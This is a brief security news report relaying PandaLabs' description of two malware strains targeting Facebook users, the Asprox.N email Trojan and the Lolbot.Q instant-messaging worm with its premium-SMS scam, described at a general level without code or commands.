      PandaLabs announced the discovery of security exploits via popular social media sites Facebook and Twitter. In the last several days, two new malware strains have been wreaking havoc on Facebook users.

      The first, Asprox.N, is a Trojan delivered via email informing users their Facebook account is being used to distribute spam and that, for security reasons, the login credentials have been changed.

      The email includes a fake Word document attachment, supposedly containing the new password, with an unusual icon and the filename Facebook_details.exe.

      The attachment deceives victims by opening a .doc file when it is launched, but it is really a Trojan that downloads another file designed to open all available ports and connect to mail service providers in an attempt to spam as many users as possible.

      The second new malware strain, Lolbot.Q, is distributed across instant messaging applications such as AIM or Yahoo!, with a message displaying a malicious link.

      Clicking the link downloads a worm designed to hijack Facebook accounts, blocking users' access while informing them that the account has been suspended.

      To "reactivate" their account, users are asked to complete a questionnaire, promising prizes such as laptops and iPads. After several questions, users are asked to subscribe and enter their cell phone number, which is in turn charged a fee of $11.60 per week.

      Victims can restore access to their Facebook account only once they subscribe to the service and receive a new password.

      "Once again cybercriminals are using social engineering to trick victims and infect them with malware," said Luis Corrons, technical director of PandaLabs. "Given the increasing popularity of social media, it is no surprise that it is being exploited to lure victims."